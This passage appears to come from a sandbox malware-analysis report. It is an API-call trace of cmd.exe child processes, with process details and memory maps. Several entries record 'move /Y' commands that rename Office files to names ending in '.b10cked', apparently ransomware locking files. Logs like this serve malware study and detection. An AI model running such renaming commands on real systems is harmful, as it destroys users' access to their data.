(_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0156.574] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0156.574] _wcsicmp (_String1="OUTLLI~1.TRX", _String2=".") returned 65 [0156.574] _wcsicmp (_String1="OUTLLI~1.TRX", _String2="..") returned 65 [0156.574] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlli~1.trx")) returned 0x2020 [0156.574] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x301f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0156.575] SetErrorMode (uMode=0x0) returned 0x0 [0156.575] SetErrorMode (uMode=0x1) returned 0x0 [0156.575] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX", nBufferLength=0x104, lpBuffer=0x28ee4c, lpFilePart=0x28ee34 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX", lpFilePart=0x28ee34*="OUTLLI~1.TRX") returned 0x3c [0156.575] SetErrorMode (uMode=0x0) returned 0x1 [0156.575] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0156.575] _wcsicmp (_String1="OUTLLI~1.TRX", _String2=".") returned 65 [0156.575] _wcsicmp (_String1="OUTLLI~1.TRX", _String2="..") returned 65 [0156.575] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlli~1.trx")) returned 0x2020 [0156.575] SetErrorMode (uMode=0x0) returned 0x0 [0156.575] SetErrorMode (uMode=0x1) returned 0x0 [0156.575] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX", nBufferLength=0x104, lpBuffer=0x28f2c8, lpFilePart=0x28f060 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX", lpFilePart=0x28f060*="OUTLLI~1.TRX") returned 0x3c [0156.575] SetErrorMode (uMode=0x0) returned 0x1 [0156.575] SetErrorMode (uMode=0x0) returned 0x0 [0156.575] SetErrorMode (uMode=0x1) returned 0x0 [0156.575] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x28f4d0, lpFilePart=0x28f060 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked", lpFilePart=0x28f060*="OUTLLIBR.DLL.trx_dll.b10cked") returned 0x4c [0156.575] SetErrorMode (uMode=0x0) returned 0x1 [0156.575] SetLastError (dwErrCode=0x0) [0156.575] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outllibr.dll.trx_dll.b10cked")) returned 0xffffffff [0156.575] GetLastError () returned 0x2 [0156.575] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x28e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e9dc) returned 0x302130 [0156.576] FindNextFileW (in: hFindFile=0x302130, lpFindFileData=0x28e9dc | out: lpFindFileData=0x28e9dc) returned 0 [0156.576] GetLastError () returned 0x12 [0156.576] FindClose (in: hFindFile=0x302130 | out: hFindFile=0x302130) returned 1 [0156.577] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x301cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x301cc0) returned 0x302130 [0156.577] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x28ec74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0156.577] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x28ec74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0156.577] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outllibr.dll.trx_dll")) returned 0x2020 [0156.578] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outllibr.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outllibr.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0156.578] FindClose (in: hFindFile=0x302130 | out: hFindFile=0x302130) returned 1 [0156.578] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28ec28 | out: _Buffer=" 1") returned 9 [0156.578] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.578] GetFileType (hFile=0x7) returned 0x2 [0156.578] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0156.578] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28ebb4 | out: lpMode=0x28ebb4) returned 1 [0156.579] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.579] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28ebe8 | out: lpConsoleScreenBufferInfo=0x28ebe8) returned 1 [0156.579] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0156.579] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28ec28 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0156.579] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28ec0c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28ec0c*=0x1a) returned 1 [0156.579] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.579] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0156.579] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.579] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0156.580] _get_osfhandle (_FileHandle=0) returned 0x3 [0156.580] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0156.580] SetConsoleInputExeNameW () returned 0x1 [0156.580] GetConsoleOutputCP () returned 0x1b5 [0156.580] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0156.580] SetThreadUILanguage (LangId=0x0) returned 0x409 [0156.580] exit (_Code=0) Process: id = "261" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xd3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21615 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21616 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21617 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21618 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 21619 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21620 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21621 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21622 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21623 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 21624 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21635 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21636 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21637 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21638 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 21639 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 21640 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21641 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21642 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21643 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21644 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21645 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21646 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21647 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21648 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21649 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 21650 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21651 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21652 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 21653 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 21654 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 21655 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 21656 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 21657 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 21658 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 324 os_tid = 0xe44 [0157.069] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fbcc | out: lpSystemTimeAsFileTime=0x16fbcc*(dwLowDateTime=0x978cc9c0, dwHighDateTime=0x1d440a9)) [0157.069] GetCurrentProcessId () returned 0xd3c [0157.069] GetCurrentThreadId () returned 0xe44 [0157.069] GetTickCount () returned 0x30270 [0157.069] QueryPerformanceCounter (in: lpPerformanceCount=0x16fbc4 | out: lpPerformanceCount=0x16fbc4*=21385797437) returned 1 [0157.070] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0157.070] __set_app_type (_Type=0x1) [0157.070] __p__fmode () returned 0x76b331f4 [0157.070] __p__commode () returned 0x76b331fc [0157.070] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0157.070] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0157.070] GetCurrentThreadId () returned 0xe44 [0157.070] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe44) returned 0x38 [0157.070] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0157.070] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0157.070] SetThreadUILanguage (LangId=0x0) returned 0x409 [0157.070] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0157.070] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fb5c | out: phkResult=0x16fb5c*=0x0) returned 0x2 [0157.071] VirtualQuery (in: lpAddress=0x16fb93, lpBuffer=0x16fb2c, dwLength=0x1c | out: lpBuffer=0x16fb2c*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.071] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fb2c, dwLength=0x1c | out: lpBuffer=0x16fb2c*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0157.071] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fb2c, dwLength=0x1c | out: lpBuffer=0x16fb2c*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0157.071] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fb2c, dwLength=0x1c | out: lpBuffer=0x16fb2c*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.071] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fb2c, dwLength=0x1c | out: lpBuffer=0x16fb2c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0157.071] GetConsoleOutputCP () returned 0x1b5 [0157.071] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0157.071] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0157.071] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.071] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0157.071] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.071] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0157.071] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.071] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0157.072] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.072] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0157.072] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.072] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0157.072] GetEnvironmentStringsW () returned 0x280218* [0157.072] FreeEnvironmentStringsW (penv=0x280218) returned 1 [0157.072] GetEnvironmentStringsW () returned 0x280218* [0157.072] FreeEnvironmentStringsW (penv=0x280218) returned 1 [0157.072] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eacc | out: phkResult=0x16eacc*=0x40) returned 0x0 [0157.072] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x0, lpData=0x16ead8*=0xa8, lpcbData=0x16ead0*=0x1000) returned 0x2 [0157.072] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x4, lpData=0x16ead8*=0x1, lpcbData=0x16ead0*=0x4) returned 0x0 [0157.072] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x0, lpData=0x16ead8*=0x1, lpcbData=0x16ead0*=0x1000) returned 0x2 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x4, lpData=0x16ead8*=0x0, lpcbData=0x16ead0*=0x4) returned 0x0 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x4, lpData=0x16ead8*=0x40, lpcbData=0x16ead0*=0x4) returned 0x0 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x4, lpData=0x16ead8*=0x40, lpcbData=0x16ead0*=0x4) returned 0x0 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x0, lpData=0x16ead8*=0x40, lpcbData=0x16ead0*=0x1000) returned 0x2 [0157.073] RegCloseKey (hKey=0x40) returned 0x0 [0157.073] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eacc | out: phkResult=0x16eacc*=0x40) returned 0x0 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x0, lpData=0x16ead8*=0x40, lpcbData=0x16ead0*=0x1000) returned 0x2 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x4, lpData=0x16ead8*=0x1, lpcbData=0x16ead0*=0x4) returned 0x0 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x0, lpData=0x16ead8*=0x1, lpcbData=0x16ead0*=0x1000) returned 0x2 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x4, lpData=0x16ead8*=0x0, lpcbData=0x16ead0*=0x4) returned 0x0 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x4, lpData=0x16ead8*=0x9, lpcbData=0x16ead0*=0x4) returned 0x0 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x4, lpData=0x16ead8*=0x9, lpcbData=0x16ead0*=0x4) returned 0x0 [0157.073] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ead4, lpData=0x16ead8, lpcbData=0x16ead0*=0x1000 | out: lpType=0x16ead4*=0x0, lpData=0x16ead8*=0x9, lpcbData=0x16ead0*=0x1000) returned 0x2 [0157.073] RegCloseKey (hKey=0x40) returned 0x0 [0157.073] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637f [0157.073] srand (_Seed=0x5b88637f) [0157.073] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked\"" [0157.073] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked\"" [0157.073] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.074] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x281978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0157.074] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0157.074] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0157.074] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0157.074] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0157.074] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0157.074] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0157.074] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0157.074] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0157.074] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0157.074] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0157.074] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0157.074] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0157.074] GetEnvironmentStringsW () returned 0x282368* [0157.074] FreeEnvironmentStringsW (penv=0x282368) returned 1 [0157.074] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.074] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0157.074] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0157.074] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0157.074] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0157.074] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0157.074] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0157.074] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0157.075] _wcsicmp 